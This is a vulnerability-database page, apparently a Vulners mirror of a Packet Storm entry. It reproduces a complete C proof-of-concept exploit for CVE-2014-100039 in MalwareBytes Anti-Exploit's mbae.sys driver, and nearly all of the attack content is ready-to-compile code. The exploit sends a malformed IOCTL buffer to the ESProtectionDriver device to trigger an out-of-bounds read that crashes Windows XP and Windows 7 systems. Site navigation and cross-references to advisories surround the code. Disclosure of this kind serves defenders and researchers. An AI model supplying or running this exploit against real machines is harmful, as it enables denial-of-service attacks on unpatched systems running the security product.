Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormParvez AnwarPACKETSTORM:130044
HistoryJan 21, 2015 - 12:00 a.m.

MalwareBytes Anti-Exploit Out-Of-Bounds Read Denial Of Service

2015-01-2100:00:00
Parvez Anwar
packetstormsecurity.com
17

EPSS

0.001

Percentile

21.9%

JSON
`/*  
  
Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS  
Date - 19th January 2015  
Discovered by - Parvez Anwar (@parvezghh)  
Vendor Homepage - https://www.malwarebytes.org  
Tested Version - 1.03.1.1220, 1.04.1.1012  
Driver Version - no version set - mbae.sys  
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1  
OSVDB - http://www.osvdb.org/show/osvdb/114249  
CVE ID - CVE-2014-100039  
Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/  
Fixed version - 1.05  
Fixed driver ver - no version set  
  
*/  
  
  
  
#include <stdio.h>  
#include <windows.h>  
  
#define BUFSIZE 25  
  
  
int main(int argc, char *argv[])  
{  
HANDLE hDevice;  
char devhandle[MAX_PATH];  
DWORD dwRetBytes = 0;  
BYTE sizebytes[4] = "\xff\xff\xff\x00";   
BYTE *inbuffer;  
  
  
printf("-------------------------------------------------------------------------------\n");  
printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");  
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");  
printf("-------------------------------------------------------------------------------\n\n");  
  
sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");  
  
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);  
  
memset(inbuffer, 0x41, BUFSIZE);  
memcpy(inbuffer, sizebytes, sizeof(sizebytes));  
  
printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);  
  
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);  
  
if(hDevice == INVALID_HANDLE_VALUE)  
{  
printf("\n[-] Open %s device failed\n\n", devhandle);  
return -1;  
}  
else  
{  
printf("\n[+] Open %s device successful", devhandle);  
}   
  
printf("\n[~] Press any key to DoS . . .");  
getch();  
  
DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);  
  
printf("\n[+] DoS buffer sent\n\n");  
  
CloseHandle(hDevice);  
  
return 0;  
}  
  
`

Related

exploitdb 1
prion 1
cvelist 1
openvas 1
nessus 1
exploitpack 1
cve 1
nvd 1
exploitdb
exploitdb
Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service
2015-01-20 00:00:00
prion
prion
Out-of-bounds
2015-01-13 15:59:00
cvelist
cvelist
CVE-2014-100039
2015-01-13 15:00:00
openvas
openvas
Malwarebytes Anti-Exploit < 1.05.1.1014 DoS Vulnerability - Windows
2015-01-02 00:00:00
nessus
nessus
Malwarebytes Anti-Exploit < 1.05.1.1014 DoS
2015-06-03 00:00:00
exploitpack
exploitpack
Malwarebytes Anti-Exploit 1.03.1.12201.04.1.1012 - Out-of-Bounds Read Denial of Service
2015-01-20 00:00:00
cve
cve
CVE-2014-100039
2015-01-13 15:59:39
nvd
nvd
CVE-2014-100039
2015-01-13 15:59:39

EPSS

0.001

Percentile

21.9%

JSON
Related for PACKETSTORM:130044
exploitdb1prion1cvelist1openvas1nessus1exploitpack1cve1nvd1